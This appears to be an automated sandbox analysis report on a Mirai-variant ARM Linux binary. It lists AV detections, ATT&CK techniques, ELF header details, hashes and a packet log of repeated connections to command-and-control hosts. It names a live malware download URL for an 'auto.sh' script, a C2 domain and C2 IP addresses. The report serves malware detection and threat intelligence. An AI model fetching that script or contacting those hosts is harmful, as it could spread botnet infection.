Source: arm5.elf, 5453.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5492.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5494.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5500.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5505.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5507.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5509.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5560.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5562.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5571.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5598.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5603.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5613.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5615.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5624.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5632.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmp, arm5.elf, 5637.1.00007ffe2d94b000.00007ffe2d96c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm5.elf, 5766.1.0000563ed3c68000.0000563ed3c8b000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 5766.1.00007f5cc8033000.00007f5cc8042000.rw-.sdmpBinary or memory string: $/tmp/vmware-root_727-4290690966 x$
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path Interception1
Hidden Files and Directories
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Indicator Removal
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583023 Sample: arm5.elf Startdate: 01/01/2025 Architecture: LINUX Score: 72 35 tcpdown.suo. [malformed] 2->35 37 107.175.130.16, 52438, 52440, 52442 AS-COLOCROSSINGUS United States 2->37 39 3 other IPs or domains 2->39 41 Antivirus / Scanner detection for submitted sample 2->41 43 Multi AV Scanner detection for submitted file 2->43 9 arm5.elf 2->9         started        12 gnome-session-binary sh gsd-rfkill 2->12         started        14 gdm3 Default 2->14         started        16 2 other processes 2->16 signatures3 45 Sends malformed DNS queries 35->45 process4 signatures5 51 Sample deletes itself 9->51 18 arm5.elf 9->18         started        process6 process7 20 arm5.elf 18->20         started        23 arm5.elf 18->23         started        signatures8 47 Manipulation of devices in /dev 20->47 49 Deletes system log files 20->49 25 arm5.elf 20->25         started        27 arm5.elf 20->27         started        29 arm5.elf 20->29         started        33 36 other processes 20->33 31 arm5.elf 23->31         started        process9
SourceDetectionScannerLabelLink
arm5.elf53%ReversingLabsLinux.Trojan.Mirai
arm5.elf100%AviraEXP/ELF.Mirai.W
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://154.216.18.192/auto.sh;100%Avira URL Cloudmalware
http://154.216.18.192/auto.sh100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
tcpdown.su
45.200.149.95
truetrue
    unknown
    tcpdown.su|!
    unknown
    unknownfalse
      unknown
      tcpdown.suo. [malformed]
      unknown
      unknowntrue
        unknown
        tcpdown.su
        unknown
        unknownfalse
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://154.216.18.192/auto.sharm5.elffalse
          • Avira URL Cloud: malware
          unknown
          http://154.216.18.192/auto.sh;arm5.elffalse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          107.175.130.16
          unknownUnited States
          36352AS-COLOCROSSINGUSfalse
          23.94.37.42
          unknownUnited States
          36352AS-COLOCROSSINGUSfalse
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          tcpdown.sux86_64.crdownload.0.drGet hashmaliciousUnknownBrowse
          • 104.168.45.11
          jmhrc116WA.elfGet hashmaliciousUnknownBrowse
          • 172.245.119.70
          VtMI9Eirot.elfGet hashmaliciousUnknownBrowse
          • 172.245.119.70
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          AS-COLOCROSSINGUSboatnet.sh4.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.arm7.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.spc.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.ppc.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.m68k.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.arm.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.x86.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.mips.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          rebirth.m68.elfGet hashmaliciousGafgytBrowse
          • 23.95.72.235
          AS-COLOCROSSINGUSboatnet.sh4.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.arm7.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.spc.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.ppc.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.m68k.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.arm.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.x86.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          boatnet.mips.elfGet hashmaliciousMiraiBrowse
          • 104.168.45.33
          rebirth.m68.elfGet hashmaliciousGafgytBrowse
          • 23.95.72.235
          No context
          No context
          No created / dropped files found
          File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
          Entropy (8bit):5.777281727463
          TrID:
          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
          File name:arm5.elf
          File size:79'248 bytes
          MD5:4b09887a801d61eabb31032837d0ddd4
          SHA1:61adff60110349551db664dd786c0d7d9fb5b14a
          SHA256:56f9f81acb4735ab3a4e0652ded76b3d4fffc1382fad16b9a89d86f2b018fef4
          SHA512:210a18ad7bea9e0c1f5fcb4c83fa18fb9d9a36cb0c7615976e827ee3c89cf4dec9147336c0f017fe7c0546b34f5b7053dd9df058d5ce77432451caa471d691cc
          SSDEEP:1536:hjeYkWygyvrPuXxf/e0/rWsJgNy2bs4xn3WmWcb:hjeAHVrCsJg02bsaGmTb
          TLSH:30732981BC819613C6D512BBF66E428D372663A8D3EF3203DD226F21778692F0E77645
          File Content Preview:.ELF...a..........(.........4....4......4. ...(.....................P'..P'...............0...0...0..................Q.td..................................-...L."....?..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

          ELF header

          Class:ELF32
          Data:2's complement, little endian
          Version:1 (current)
          Machine:ARM
          Version Number:0x1
          Type:EXEC (Executable file)
          OS/ABI:ARM - ABI
          ABI Version:0
          Entry Point Address:0x8190
          Flags:0x2
          ELF Header Size:52
          Program Header Offset:52
          Program Header Size:32
          Number of Program Headers:3
          Section Header Offset:78848
          Section Header Size:40
          Number of Section Headers:10
          Header String Table Index:9
          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
          NULL0x00x00x00x00x0000
          .initPROGBITS0x80940x940x180x00x6AX004
          .textPROGBITS0x80b00xb00xfca40x00x6AX0016
          .finiPROGBITS0x17d540xfd540x140x00x6AX004
          .rodataPROGBITS0x17d680xfd680x29e80x00x2A004
          .ctorsPROGBITS0x230000x130000x80x00x3WA004
          .dtorsPROGBITS0x230080x130080x80x00x3WA004
          .dataPROGBITS0x230140x130140x3ac0x00x3WA004
          .bssNOBITS0x233c00x133c00xe70c0x00x3WA004
          .shstrtabSTRTAB0x00x133c00x3e0x00x0001
          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
          LOAD0x00x80000x80000x127500x127505.91150x5R E0x8000.init .text .fini .rodata
          LOAD0x130000x230000x230000x3c00xeacc2.76620x6RW 0x8000.ctors .dtors .data .bss
          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
          TimestampSource PortDest PortSource IPDest IP
          Jan 1, 2025 15:06:44.714004040 CET530382601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:44.718750954 CET26015303823.94.37.42192.168.2.13
          Jan 1, 2025 15:06:44.718805075 CET530382601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:44.721318007 CET530382601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:44.726061106 CET26015303823.94.37.42192.168.2.13
          Jan 1, 2025 15:06:44.726100922 CET530382601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:44.730906010 CET26015303823.94.37.42192.168.2.13
          Jan 1, 2025 15:06:45.274821997 CET26015303823.94.37.42192.168.2.13
          Jan 1, 2025 15:06:45.274929047 CET530382601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:45.275218010 CET530382601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:46.428415060 CET530402601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:46.435131073 CET26015304023.94.37.42192.168.2.13
          Jan 1, 2025 15:06:46.435188055 CET530402601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:46.438901901 CET530402601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:46.445611000 CET26015304023.94.37.42192.168.2.13
          Jan 1, 2025 15:06:46.445657015 CET530402601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:46.452380896 CET26015304023.94.37.42192.168.2.13
          Jan 1, 2025 15:06:47.087090969 CET26015304023.94.37.42192.168.2.13
          Jan 1, 2025 15:06:47.087181091 CET530402601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:47.087181091 CET530402601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:48.191175938 CET530422601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:48.196001053 CET26015304223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:48.196053982 CET530422601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:48.198491096 CET530422601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:48.203304052 CET26015304223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:48.203340054 CET530422601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:48.208163023 CET26015304223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:48.774722099 CET26015304223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:48.775002003 CET530422601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:48.775182009 CET530422601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:49.959929943 CET530442601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:49.964796066 CET26015304423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:49.964904070 CET530442601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:49.974267960 CET530442601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:49.979078054 CET26015304423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:49.979140043 CET530442601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:49.983906984 CET26015304423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:50.530169010 CET26015304423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:50.530250072 CET530442601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:50.530298948 CET530442601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:50.807548046 CET524387722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:50.812439919 CET772252438107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:50.812499046 CET524387722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:50.814429045 CET524387722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:50.814826012 CET524387722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:50.819271088 CET772252438107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:50.871831894 CET772252438107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:50.916939974 CET524407722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:50.921871901 CET772252440107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:50.922935963 CET524407722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:51.015626907 CET524407722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:51.015780926 CET524407722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:51.020447016 CET772252440107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:51.063843966 CET772252440107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:51.280096054 CET524427722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:51.286042929 CET772252442107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:51.286113024 CET524427722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:51.289921999 CET524427722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:51.290018082 CET524427722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:51.295512915 CET772252442107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:51.339833021 CET772252442107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:51.625015020 CET530522601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:51.629863977 CET26015305223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:51.629961967 CET530522601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:51.632239103 CET530522601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:51.637128115 CET26015305223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:51.637172937 CET530522601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:51.641967058 CET26015305223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:52.200278997 CET26015305223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:52.200397015 CET530522601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:52.200397015 CET530522601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:52.241295099 CET772252438107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:52.241373062 CET524387722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:52.340828896 CET772252440107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:52.340926886 CET524407722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:52.734256029 CET772252442107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:52.734338045 CET524427722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:53.288681984 CET530542601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:53.293473005 CET26015305423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:53.293529034 CET530542601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:53.295860052 CET530542601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:53.300714970 CET26015305423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:53.300769091 CET530542601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:53.305552959 CET26015305423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:53.860877991 CET26015305423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:53.860976934 CET530542601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:53.860977888 CET530542601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:54.206274033 CET524487722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.213720083 CET772252448107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:54.213789940 CET524487722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.216478109 CET524487722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.216628075 CET524487722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.221184015 CET772252448107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:54.267819881 CET772252448107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:54.345623970 CET524507722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.350538969 CET772252450107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:54.350595951 CET524507722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.358865976 CET524507722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.359008074 CET524507722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.363663912 CET772252450107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:54.411896944 CET772252450107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:54.491461039 CET524527722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.496366024 CET772252452107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:54.496412992 CET524527722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.500154018 CET524527722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.500263929 CET524527722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:54.504962921 CET772252452107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:54.547849894 CET772252452107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:54.953152895 CET530622601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:54.958022118 CET26015306223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:54.958092928 CET530622601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:54.960658073 CET530622601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:54.967912912 CET26015306223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:54.967974901 CET530622601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:54.973297119 CET26015306223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:55.525870085 CET26015306223.94.37.42192.168.2.13
          Jan 1, 2025 15:06:55.525980949 CET530622601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:55.525980949 CET530622601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:55.633168936 CET772252448107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:55.633238077 CET524487722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:55.757386923 CET772252450107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:55.757460117 CET524507722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:55.894933939 CET772252452107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:55.895001888 CET524527722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:56.618192911 CET530642601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:56.622977972 CET26015306423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:56.623028040 CET530642601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:56.625329971 CET530642601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:56.630155087 CET26015306423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:56.630196095 CET530642601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:56.635036945 CET26015306423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:57.187819958 CET26015306423.94.37.42192.168.2.13
          Jan 1, 2025 15:06:57.187894106 CET530642601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:57.187944889 CET530642601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:58.305955887 CET530662601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:58.310733080 CET26015306623.94.37.42192.168.2.13
          Jan 1, 2025 15:06:58.310784101 CET530662601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:58.317226887 CET530662601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:58.321997881 CET26015306623.94.37.42192.168.2.13
          Jan 1, 2025 15:06:58.322041988 CET530662601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:58.326877117 CET26015306623.94.37.42192.168.2.13
          Jan 1, 2025 15:06:58.890616894 CET26015306623.94.37.42192.168.2.13
          Jan 1, 2025 15:06:58.890681982 CET530662601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:58.890726089 CET530662601192.168.2.1323.94.37.42
          Jan 1, 2025 15:06:59.293117046 CET524607722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:59.298105001 CET772252460107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:59.298250914 CET524607722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:59.300383091 CET524607722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:59.300383091 CET524607722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:59.303746939 CET524627722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:59.305174112 CET772252460107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:59.308542013 CET772252462107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:59.313676119 CET524627722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:59.340056896 CET524627722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:59.340219021 CET524627722192.168.2.13107.175.130.16
          Jan 1, 2025 15:06:59.345474005 CET772252462107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:59.347821951 CET772252460107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:59.387860060 CET772252462107.175.130.16192.168.2.13
          Jan 1, 2025 15:06:59.996032000 CET530722601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:00.002319098 CET26015307223.94.37.42192.168.2.13
          Jan 1, 2025 15:07:00.002460957 CET530722601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:00.004621029 CET530722601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:00.010943890 CET26015307223.94.37.42192.168.2.13
          Jan 1, 2025 15:07:00.010993004 CET530722601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:00.017429113 CET26015307223.94.37.42192.168.2.13
          Jan 1, 2025 15:07:00.547521114 CET26015307223.94.37.42192.168.2.13
          Jan 1, 2025 15:07:00.547631025 CET530722601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:00.547631025 CET530722601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:00.741662025 CET772252462107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:00.741744041 CET524627722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:00.742978096 CET772252460107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:00.743043900 CET524607722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:01.797317982 CET530742601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:01.802252054 CET26015307423.94.37.42192.168.2.13
          Jan 1, 2025 15:07:01.802318096 CET530742601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:01.803864956 CET530742601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:01.808630943 CET26015307423.94.37.42192.168.2.13
          Jan 1, 2025 15:07:01.808686018 CET530742601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:01.813453913 CET26015307423.94.37.42192.168.2.13
          Jan 1, 2025 15:07:02.349752903 CET26015307423.94.37.42192.168.2.13
          Jan 1, 2025 15:07:02.349817038 CET530742601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:02.349864006 CET530742601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:03.427133083 CET530762601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:03.431938887 CET26015307623.94.37.42192.168.2.13
          Jan 1, 2025 15:07:03.431999922 CET530762601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:03.432982922 CET530762601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:03.437753916 CET26015307623.94.37.42192.168.2.13
          Jan 1, 2025 15:07:03.437788010 CET530762601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:03.442553997 CET26015307623.94.37.42192.168.2.13
          Jan 1, 2025 15:07:03.974133968 CET26015307623.94.37.42192.168.2.13
          Jan 1, 2025 15:07:03.974183083 CET530762601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:03.974220037 CET530762601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:04.283176899 CET524707722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:04.288152933 CET772252470107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:04.288209915 CET524707722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:04.288923979 CET524707722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:04.289011955 CET524707722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:04.293765068 CET772252470107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:04.335870028 CET772252470107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:05.052504063 CET530802601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:05.057348967 CET26015308023.94.37.42192.168.2.13
          Jan 1, 2025 15:07:05.057435989 CET530802601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:05.058754921 CET530802601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:05.063524961 CET26015308023.94.37.42192.168.2.13
          Jan 1, 2025 15:07:05.063621044 CET530802601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:05.068406105 CET26015308023.94.37.42192.168.2.13
          Jan 1, 2025 15:07:05.601505995 CET26015308023.94.37.42192.168.2.13
          Jan 1, 2025 15:07:05.601583958 CET530802601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:05.601633072 CET530802601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:05.695292950 CET772252470107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:05.695374966 CET524707722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:06.686764002 CET530822601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:06.691629887 CET26015308223.94.37.42192.168.2.13
          Jan 1, 2025 15:07:06.691694975 CET530822601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:06.692457914 CET530822601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:06.697206020 CET26015308223.94.37.42192.168.2.13
          Jan 1, 2025 15:07:06.697257042 CET530822601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:06.702047110 CET26015308223.94.37.42192.168.2.13
          Jan 1, 2025 15:07:07.266494989 CET26015308223.94.37.42192.168.2.13
          Jan 1, 2025 15:07:07.266558886 CET530822601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:07.266627073 CET530822601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:08.345213890 CET530842601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:08.349972010 CET26015308423.94.37.42192.168.2.13
          Jan 1, 2025 15:07:08.350043058 CET530842601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:08.351341009 CET530842601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:08.356118917 CET26015308423.94.37.42192.168.2.13
          Jan 1, 2025 15:07:08.356194019 CET530842601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:08.360986948 CET26015308423.94.37.42192.168.2.13
          Jan 1, 2025 15:07:08.922729969 CET26015308423.94.37.42192.168.2.13
          Jan 1, 2025 15:07:08.922791958 CET530842601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:08.922847986 CET530842601192.168.2.1323.94.37.42
          Jan 1, 2025 15:07:09.322915077 CET524787722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:09.327940941 CET772252478107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:09.328001976 CET524787722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:09.328496933 CET524787722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:09.328589916 CET524787722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:09.333261967 CET772252478107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:09.379817963 CET772252478107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:09.823054075 CET524807722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:09.827955008 CET772252480107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:09.828011036 CET524807722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:09.830588102 CET524807722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:09.830677032 CET524807722192.168.2.13107.175.130.16
          Jan 1, 2025 15:07:09.835387945 CET772252480107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:09.875900984 CET772252480107.175.130.16192.168.2.13
          Jan 1, 2025 15:07:10.025846958 CET530902601192.168.2.1323.94.37.42
